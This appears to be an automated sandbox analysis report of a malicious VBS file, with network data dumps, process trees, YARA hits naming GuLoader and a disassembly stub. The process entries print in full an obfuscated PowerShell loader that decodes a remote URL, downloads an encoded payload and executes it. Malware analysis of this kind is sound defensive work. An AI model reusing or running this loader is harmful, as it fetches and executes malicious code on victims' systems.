                                Data Ascii: mHj9DznKId//3jNDvdJwOrWTlHqdIsBsR8kwNR0xpFs8b9+lq+FpWlPjDWd4BASTBl5PrwkchVRKdk3d5r05v3CMZmM8WKDYLn55sRaJIKBCZB7SqHNI7ApTV/KrHso57nk9XZK6GDRrUG9lBlL78fvArqRQVvAjCMLABj52Wx/gXfnuXj1pCayGYEPQ1/8CCvwo0zv1kGosV/GoXlUIUPAWUw+EKND3cvqQah/q450I0oZzOd/7KrP7Fp4QSO5
                                2024-10-23 09:30:18 UTC8000INData Raw: 38 64 50 73 71 4b 34 31 57 31 37 53 32 53 35 47 30 74 67 6c 42 54 2b 6e 47 78 6a 4f 64 76 39 56 77 46 45 34 4b 6b 56 44 49 4a 41 5a 50 30 39 70 2b 6d 48 43 59 31 77 45 50 67 4a 64 5a 4e 6f 6a 53 38 6b 31 64 66 62 61 71 69 51 4e 73 34 38 33 35 34 75 73 57 43 59 46 45 75 44 59 4c 61 4c 34 4b 75 67 71 58 2b 50 44 37 59 75 6e 35 2b 33 72 70 4a 69 79 75 2f 41 2b 2b 78 58 5a 66 2b 6e 4e 47 31 2f 72 6d 5a 77 77 59 5a 6e 5a 66 6f 46 70 33 61 76 72 2b 45 33 76 74 44 33 36 66 38 54 75 2f 51 73 6b 31 55 79 68 46 67 64 36 59 66 5a 64 4c 37 4c 49 55 58 71 33 70 45 69 4c 33 64 42 44 75 67 33 73 52 39 36 68 37 45 66 65 6f 65 78 48 64 70 77 67 69 31 77 2f 59 32 72 68 68 2f 46 4c 4b 47 6f 4b 6d 42 33 38 75 6e 4f 63 6f 56 63 72 44 6c 78 54 4e 53 61 7a 65 6f 41 48 75 45 54
                                Data Ascii: 8dPsqK41W17S2S5G0tglBT+nGxjOdv9VwFE4KkVDIJAZP09p+mHCY1wEPgJdZNojS8k1dfbaqiQNs48354usWCYFEuDYLaL4KugqX+PD7Yun5+3rpJiyu/A++xXZf+nNG1/rmZwwYZnZfoFp3avr+E3vtD36f8Tu/Qsk1UyhFgd6YfZdL7LIUXq3pEiL3dBDug3sR96h7EfeoexHdpwgi1w/Y2rhh/FLKGoKmB38unOcoVcrDlxTNSazeoAHuET
                                2024-10-23 09:30:18 UTC8000INData Raw: 36 4b 58 38 31 78 64 79 34 30 44 73 65 6e 78 78 68 56 78 6b 69 50 6d 59 2f 55 52 6a 38 53 45 55 6f 74 55 58 4d 62 43 42 75 43 61 79 76 48 59 64 65 6a 58 59 46 4c 4d 46 52 39 47 2b 63 45 4d 6f 52 30 6a 51 4c 6e 2b 52 43 55 31 63 70 54 7a 55 67 35 45 32 4d 4f 2f 5a 4f 6b 49 43 6a 65 55 4c 55 75 41 33 61 36 7a 4e 41 76 69 78 50 4a 61 6e 2b 65 31 4c 58 42 4c 63 48 78 50 79 54 43 30 58 71 2b 61 64 37 64 71 78 66 45 54 76 69 79 4e 33 76 54 53 52 75 67 44 7a 34 39 30 6e 47 44 6e 64 61 6c 42 49 69 55 63 57 33 51 46 2b 4a 4d 42 71 6e 58 42 6d 57 39 45 49 78 47 6a 4f 6e 2b 69 58 54 4d 7a 71 75 42 2f 76 41 33 31 52 70 4f 70 41 63 79 48 49 63 79 43 6d 51 66 32 34 63 65 55 5a 72 49 5a 77 59 36 44 56 43 7a 6f 69 6b 73 31 71 47 57 37 36 64 6f 79 57 49 7a 64 6a 44 64 63
                                Data Ascii: 6KX81xdy40DsenxxhVxkiPmY/URj8SEUotUXMbCBuCayvHYdejXYFLMFR9G+cEMoR0jQLn+RCU1cpTzUg5E2MO/ZOkICjeULUuA3a6zNAvixPJan+e1LXBLcHxPyTC0Xq+ad7dqxfETviyN3vTSRugDz490nGDndalBIiUcW3QF+JMBqnXBmW9EIxGjOn+iXTMzquB/vA31RpOpAcyHIcyCmQf24ceUZrIZwY6DVCzoiks1qGW76doyWIzdjDdc
                                2024-10-23 09:30:18 UTC8000INData Raw: 33 71 4c 64 47 74 39 62 53 67 4b 59 56 4c 6e 33 62 36 58 50 61 32 79 32 64 4d 4d 54 59 72 62 55 66 42 49 63 6d 2b 6c 48 32 76 6f 69 44 6d 6c 67 44 61 34 48 56 7a 47 2b 77 43 73 6e 45 35 4d 66 6b 5a 6f 55 62 64 69 47 36 52 6b 68 63 7a 45 44 77 4b 62 78 41 45 67 71 50 6b 44 43 50 68 79 6e 74 4b 5a 52 39 62 34 56 74 52 32 73 68 6e 52 44 4a 4e 52 32 55 50 39 35 73 4a 57 31 37 76 5a 76 4f 47 6f 45 78 61 58 33 79 4c 6c 46 32 48 39 6d 78 41 62 62 6d 69 65 50 7a 65 37 56 34 47 71 78 74 4c 49 78 50 63 33 6f 6b 51 4b 41 58 55 4d 54 69 78 76 72 2b 78 34 53 79 4f 58 5a 66 42 4f 5a 70 4d 66 72 2b 2f 2f 75 70 7a 58 36 6e 71 39 47 65 53 4f 76 6e 48 33 75 58 66 30 56 6f 64 39 6a 37 54 6c 4a 4f 66 43 55 43 45 2f 65 6f 6b 31 31 68 71 33 74 41 54 6b 45 47 75 76 63 70 69 76
                                Data Ascii: 3qLdGt9bSgKYVLn3b6XPa2y2dMMTYrbUfBIcm+lH2voiDmlgDa4HVzG+wCsnE5MfkZoUbdiG6RkhczEDwKbxAEgqPkDCPhyntKZR9b4VtR2shnRDJNR2UP95sJW17vZvOGoExaX3yLlF2H9mxAbbmiePze7V4GqxtLIxPc3okQKAXUMTixvr+x4SyOXZfBOZpMfr+//upzX6nq9GeSOvnH3uXf0Vod9j7TlJOfCUCE/eok11hq3tATkEGuvcpiv
                                2024-10-23 09:30:18 UTC8000INData Raw: 37 54 66 6f 68 69 58 37 4f 6f 33 4e 45 38 6f 52 47 71 58 73 52 54 66 36 6f 4b 66 2b 52 75 58 66 4b 56 4a 65 51 42 65 61 65 6e 6e 70 66 76 4c 32 50 50 48 6b 70 45 43 6d 4a 7a 62 4f 2f 67 33 66 4f 59 76 72 37 4e 39 72 62 62 4d 39 4f 4b 4b 71 31 71 48 73 52 64 6c 4f 2b 71 47 2f 31 64 4a 34 4f 46 6e 67 52 72 4b 6d 72 6d 6d 49 5a 65 68 48 33 4b 51 5a 6c 6a 36 56 37 45 66 67 6e 57 66 38 49 56 30 50 62 4d 4b 6a 6a 2b 46 4a 75 2b 69 48 6c 4b 6e 4e 57 7a 32 44 36 49 63 67 50 59 4e 39 79 61 76 6f 68 71 47 51 6e 4c 6e 4e 57 66 73 2f 38 51 6e 6f 38 4c 61 4f 52 45 44 43 6f 6c 37 66 6a 78 2f 6f 68 7a 38 54 37 32 58 61 59 4d 6f 36 55 73 2f 2f 33 64 70 68 73 6d 63 65 7a 38 6f 53 6a 71 6e 73 52 63 32 72 42 5a 48 33 63 32 70 41 46 2f 62 69 6a 33 43 6b 47 5a 65 58 56 65 78
                                Data Ascii: 7TfohiX7Oo3NE8oRGqXsRTf6oKf+RuXfKVJeQBeaennpfvL2PPHkpECmJzbO/g3fOYvr7N9rbbM9OKKq1qHsRdlO+qG/1dJ4OFngRrKmrmmIZehH3KQZlj6V7EfgnWf8IV0PbMKjj+FJu+iHlKnNWz2D6IcgPYN9yavohqGQnLnNWfs/8Qno8LaOREDCol7fjx/ohz8T72XaYMo6Us//3dphsmcez8oSjqnsRc2rBZH3c2pAF/bij3CkGZeXVex


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:05:30:12
                                Start date:23/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
                                Imagebase:0x7ff79b4c0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:1
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\PING.EXE
                                Wow64 process (32bit):false
                                Commandline:ping gormezl_6777.6777.6777.677e
                                Imagebase:0x7ff673f20000
                                File size:22'528 bytes
                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:2
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:05:30:22
                                Start date:23/10/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
                                Imagebase:0xd60000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.3353773662.00000000084D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3353948398.000000000C936000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:7
                                Start time:05:30:22
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FF848BDB106 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Z$$Z
                                  • API String ID: 0-2706988786
                                  • Opcode ID: 54e55ffc31d06fe2b8f887c71d0bcde1d8efa2e29af4effa28b13036ffd839fd
                                  • Instruction ID: 403c8b9572c51f7af47c2c187e0a59bb16ea4da9346239d6ba5da39f5fa4de48
                                  • Opcode Fuzzy Hash: 54e55ffc31d06fe2b8f887c71d0bcde1d8efa2e29af4effa28b13036ffd839fd
